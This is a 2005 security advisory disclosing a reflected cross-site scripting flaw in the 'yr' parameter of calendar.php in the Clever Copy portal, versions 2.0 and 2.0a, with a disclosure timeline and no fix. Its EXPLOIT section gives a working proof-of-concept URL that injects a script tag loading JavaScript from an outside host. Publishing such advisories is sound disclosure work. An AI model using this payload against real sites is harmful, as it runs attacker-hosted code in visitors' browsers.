cleverXSS.txt

`################################################  
Clever copy 'calendar.php' 'yr' variable cross site scripting  
vendor url:http://clevercopy.bestdirectbuy.com  
advisory:http://lostmon.blogspot.com/2005/07/  
clever-copy-calendarphp-yr-variable.html  
vendor notify: yes exploit available:yes  
################################################  
  
Clever Copy is a free, fully scalable web site portal and news posting  
system.You can run it as a very simple blog or ramp it up to a full  
Content Management System  
  
Clever Copy contains a flaw that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate 'yr'  
variable upon submission to 'calendar.php' script.This could allow a  
user to create a specially crafted URL that would execute arbitrary  
code in a user's browser within the trust relationship between  
the browser and the server, leading to a loss of integrity  
  
##############  
VERSIONS  
##############  
  
Clever Copy version 2.0a  
Clever Copy version 2.0  
  
##############  
SOLUTION  
##############  
  
No solution at this time  
  
##############  
TIMELINE  
##############  
  
Discovered: 12-07-2005  
Vendor notify: 13-07-2005  
Vendor response:14-07-2005  
Disclosure: 15-07-2005  
  
##############  
EXPLOIT  
##############  
  
http://[victim]/calendar.php?mth=3&yr=2006"><script  
src="http://www.drorshalev.com/dev/injection/js.js"></script>  
  
######################## €nd #############################  
  
Thnx to estrella to be my ligth  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`